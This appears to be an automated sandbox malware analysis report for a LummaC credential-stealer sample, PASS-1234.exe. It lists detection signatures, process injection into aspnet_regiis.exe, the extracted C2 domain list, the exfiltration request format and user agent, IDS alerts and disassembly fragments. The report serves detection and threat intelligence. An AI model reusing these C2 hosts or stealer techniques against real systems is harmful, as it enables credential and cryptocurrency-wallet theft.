Edit tour

Windows Analysis Report
PASS-1234.exe

Overview

General Information

Sample name:	PASS-1234.exe
Analysis ID:	1582873
MD5:	cf15f3e3576d512cf0696d4035212451
SHA1:	b9d2ae2405dbd77d4d6c226589990872319f98ce
SHA256:	3114e7c13f6545c7cb73343fbcb4ec4b0648751091d796f7923b17818603fb36
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

PASS-1234.exe (PID: 1916 cmdline: "C:\Users\user\Desktop\PASS-1234.exe" MD5: CF15F3E3576D512CF0696D4035212451)

conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 4512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 4776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "nearycrepso.shop", "framekgirus.shop", "abruptyopsn.shop", "tirepublicerj.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "undesirabkel.click"], "Build id": "LPnhqo--wcyjskajenao"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PASS-1234.exe PID: 1916	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 4512	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 4512	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 4512	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 4512	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 5 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:39:14.786997+0100	2028371	3	Unknown Traffic	192.168.2.6	49709	188.114.97.3	443	TCP
2024-12-31T17:39:46.812877+0100	2028371	3	Unknown Traffic	192.168.2.6	49898	104.21.96.1	443	TCP
2024-12-31T17:40:08.343881+0100	2028371	3	Unknown Traffic	192.168.2.6	49986	104.21.96.1	443	TCP
2024-12-31T17:40:09.507842+0100	2028371	3	Unknown Traffic	192.168.2.6	49988	104.21.96.1	443	TCP
2024-12-31T17:40:10.734503+0100	2028371	3	Unknown Traffic	192.168.2.6	49989	104.21.96.1	443	TCP
2024-12-31T17:40:11.944071+0100	2028371	3	Unknown Traffic	192.168.2.6	49990	104.21.96.1	443	TCP
2024-12-31T17:40:13.518980+0100	2028371	3	Unknown Traffic	192.168.2.6	49991	104.21.96.1	443	TCP
2024-12-31T17:40:16.683127+0100	2028371	3	Unknown Traffic	192.168.2.6	49992	104.21.96.1	443	TCP
2024-12-31T17:40:18.160408+0100	2028371	3	Unknown Traffic	192.168.2.6	49993	104.21.96.1	443	TCP
2024-12-31T17:40:21.336200+0100	2028371	3	Unknown Traffic	192.168.2.6	49994	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:39:46.220798+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49709	188.114.97.3	443	TCP
2024-12-31T17:40:07.873836+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49898	104.21.96.1	443	TCP
2024-12-31T17:40:08.799774+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49986	104.21.96.1	443	TCP
2024-12-31T17:40:21.794131+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49994	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:39:46.220798+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49709	188.114.97.3	443	TCP
2024-12-31T17:40:07.873836+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49898	104.21.96.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:40:08.799774+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49986	104.21.96.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (abruptyopsn .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:39:46.812877+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49898	104.21.96.1	443	TCP
2024-12-31T17:40:08.343881+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49986	104.21.96.1	443	TCP
2024-12-31T17:40:09.507842+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49988	104.21.96.1	443	TCP
2024-12-31T17:40:10.734503+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49989	104.21.96.1	443	TCP
2024-12-31T17:40:11.944071+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49990	104.21.96.1	443	TCP
2024-12-31T17:40:13.518980+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49991	104.21.96.1	443	TCP
2024-12-31T17:40:16.683127+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49992	104.21.96.1	443	TCP
2024-12-31T17:40:18.160408+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49993	104.21.96.1	443	TCP
2024-12-31T17:40:21.336200+0100	2058599	1	Domain Observed Used for C2 Detected	192.168.2.6	49994	104.21.96.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:39:14.786997+0100	2058551	1	Domain Observed Used for C2 Detected	192.168.2.6	49709	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:39:46.331181+0100	2058598	1	Domain Observed Used for C2 Detected	192.168.2.6	57016	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:39:46.244581+0100	2058616	1	Domain Observed Used for C2 Detected	192.168.2.6	57616	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:39:14.247349+0100	2058550	1	Domain Observed Used for C2 Detected	192.168.2.6	50384	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T17:40:10.010366+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49988	104.21.96.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://abruptyopsn.shop:443/apial	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/api9v9-	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop:443/apiffxt.default-release/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/apii	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/4	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/Ow	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/N	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/apid	Avira URL Cloud: Label: malware
Source: undesirabkel.click	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/api	Avira URL Cloud: Label: malware
Source: https://undesirabkel.click/api	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/Y	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/22h	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/apiNET;	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/g	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/apiB	Avira URL Cloud: Label: malware
Source: https://abruptyopsn.shop/api4	Avira URL Cloud: Label: malware

Found malware configuration

Source: 3.2.aspnet_regiis.exe.3170000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "nearycrepso.shop", "framekgirus.shop", "abruptyopsn.shop", "tirepublicerj.shop", "rabidcowse.shop", "wholersorie.shop", "cloudewahsj.shop", "undesirabkel.click"], "Build id": "LPnhqo--wcyjskajenao"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\gdi32.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PASS-1234.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: undesirabkel.click
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.3389570184.00000000031B2000.00000002.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--wcyjskajenao

Source: PASS-1234.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49994 version: TLS 1.2

Source: PASS-1234.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\Desktop\PASS-1234.PDB source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdba source: WERECA6.tmp.dmp.6.dr
Source:	Binary string: %%.pdb source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: HP^o0C:\Windows\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WERECA6.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb Cultu source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5t source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERECA6.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbN source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERECA6.tmp.dmp.6.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbxi source: PASS-1234.exe, 00000000.00000002.2208701388.0000000001381000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\PASS-1234.PDB source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PASS-1234.exe

Code function: 0_2_6D393562 FindFirstFileExW,

0_2_6D393562

Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 4x nop then mov ebx, eax	0_2_00BB6860
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 4x nop then mov ebp, eax	0_2_00BB6860
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-56F603F1h]	0_2_00BED110
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00BB3A90
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00BB83F0
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00BB83F0
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00BC5E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+09h]	3_2_0317AB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6E7A9B35h]	3_2_03196B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6E7A9B35h]	3_2_03196B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+0D4DFAB1h]	3_2_031AFA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	3_2_031AD962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, edx	3_2_0317B9B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-54159B5Eh]	3_2_0317C9D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov al, 01h	3_2_031AE1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi-4Fh]	3_2_031AE043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	3_2_0317DF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0319C601
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-56F603E5h]	3_2_0319D5B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6E87DD67h	3_2_031ABDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ebx	3_2_031ABDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esi+1Ch], edi	3_2_0317CDCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [eax], cl	3_2_0317CDCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_031A5B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	3_2_03172B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_0317DBE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-56F603F1h]	3_2_031AC210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, eax	3_2_031AD25E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0319AAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+44h]	3_2_0318C11B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [ebp-44h]	3_2_03199129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, eax	3_2_03175960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebp, eax	3_2_03175960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+60h]	3_2_031889FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [esi+edx+02h], 0000h	3_2_031909F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi-61h]	3_2_0318B83D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]	3_2_031AC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_0318F040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, edx	3_2_03199862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, edx	3_2_03199862
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+0D4DFAB1h]	3_2_031B00B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_031870CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+18h]	3_2_031870CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_0318D0EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	3_2_03185F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, eax	3_2_03179770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6A0FF1DCh]	3_2_03179770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	3_2_03179770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_0319AFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	3_2_031957D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, dword ptr [esp+2Ch]	3_2_031957D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esi+0Ch], edx	3_2_0317AFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi-72A146CEh]	3_2_03193FF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0317A7EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0319C607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3DCE6797h]	3_2_0318E630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, edi	3_2_03197E69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	3_2_03199E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_0318CE98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_0318CEB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebx], cl	3_2_0319BEA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_0318D50B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+0D4DFAB1h]	3_2_031AFD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then test eax, eax	3_2_031A9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add ecx, 02h	3_2_031A9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push eax	3_2_031A9520
